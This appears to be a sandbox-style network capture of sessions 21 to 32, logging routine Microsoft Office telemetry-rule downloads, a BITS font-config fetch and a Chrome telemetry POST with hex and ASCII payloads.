Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49735	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:20 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-09 01:47:20 UTC	515	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=226702 Date: Sat, 09 Nov 2024 01:47:20 GMT Content-Length: 55 Connection: close X-CID: 2
2024-11-09 01:47:20 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.7	49736	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:20 UTC	192	OUT	GET /rules/rule120620v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:20 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:20 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA701121" x-ms-request-id: 99102dbc-c01e-0066-43c1-2ca1ec000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014720Z-16547b76f7f67wxlhC1DFWah9w0000000ae000000000cq5v x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:20 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.7	49737	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:20 UTC	192	OUT	GET /rules/rule120621v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:20 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:20 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA41997E3" x-ms-request-id: 11f64fd8-001e-0065-16b2-310b73000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014720Z-15869dbbcc6lq45jhC1DFWbkc800000004a00000000044pq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:20 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.7	49738	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:20 UTC	192	OUT	GET /rules/rule120622v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:20 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:20 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8CEAC16" x-ms-request-id: 6bd3c087-001e-000b-13fd-2c15a7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014720Z-16547b76f7f22sh5hC1DFWyb4w0000000aag00000000hu60 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:20 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.7	49739	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:20 UTC	192	OUT	GET /rules/rule120623v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:20 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:20 GMT Content-Type: text/xml Content-Length: 464 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97FB6C3C" x-ms-request-id: 63ea3643-901e-0015-3101-2db284000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014720Z-16547b76f7f9bs6dhC1DFWt3rg0000000aag00000000spmz x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:20 UTC	464	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.7	49742	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:20 UTC	192	OUT	GET /rules/rule120624v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:20 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:20 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB7010D66" x-ms-request-id: 59e17811-301e-003f-5637-32266f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014720Z-15869dbbcc6kg5mvhC1DFW39vn00000000y0000000006t5e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:20 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49740	172.217.18.14	443	7364	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:20 UTC	714	OUT	POST /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 913 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: / Origin: chrome-untrusted://new-tab-page X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlKHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-09 01:47:20 UTC	913	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 34 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 31 31 31 36 38 33 37 35 34 30 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.134"],[1,0,0,0,0]]],373,[["1731116837540",null,null,null,
2024-11-09 01:47:20 UTC	936	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: chrome-untrusted://new-tab-page Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=519=yRagS2sIOHqGivwmP4m9ucoagdv9UuPM0RJQz3utndTBDsiZ8yy61uQSYOMOL0x4NY5F1XbHIiFImkTNRbroDJ46WsZYpVXFWhwAWIyK_JQcQ7c23RTB4JF8DKXbmDktKtRHx4XyA2V2oDntUU08cmCp7orIHyFuIDgDSWFAaC6Bwn46oA; expires=Sun, 11-May-2025 01:47:20 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Sat, 09 Nov 2024 01:47:20 GMT Server: Playlog Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Sat, 09 Nov 2024 01:47:20 GMT Connection: close Transfer-Encoding: chunked
2024-11-09 01:47:20 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-11-09 01:47:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.7	49743	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:20 UTC	192	OUT	GET /rules/rule120625v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:21 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:21 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT ETag: "0x8DC582B9748630E" x-ms-request-id: ec63dfab-b01e-0070-13a0-301cc0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014721Z-17df447cdb56mx55hC1DFWvbt400000003qg00000000a89r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:21 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.7	49744	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:21 UTC	192	OUT	GET /rules/rule120626v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:21 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:21 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DACDF62" x-ms-request-id: f9b7bb91-701e-0021-1460-2e3d45000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014721Z-15869dbbcc6pfq2ghC1DFWmp1400000003qg00000000hbut x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:21 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.7	49745	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:21 UTC	192	OUT	GET /rules/rule120627v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:21 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:21 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT ETag: "0x8DC582B9E8EE0F3" x-ms-request-id: f6e70ecd-101e-0046-277a-3091b0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014721Z-17df447cdb5rnd49hC1DFWgmpw000000011g00000000g91h x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:21 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.7	49746	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:21 UTC	192	OUT	GET /rules/rule120628v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:21 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:21 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C8E04C8" x-ms-request-id: 1e45a1cf-401e-0029-3ef1-2c9b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014721Z-16547b76f7f7scqbhC1DFW0m5w0000000acg000000003y3d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:21 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.7	49747	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:21 UTC	192	OUT	GET /rules/rule120629v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
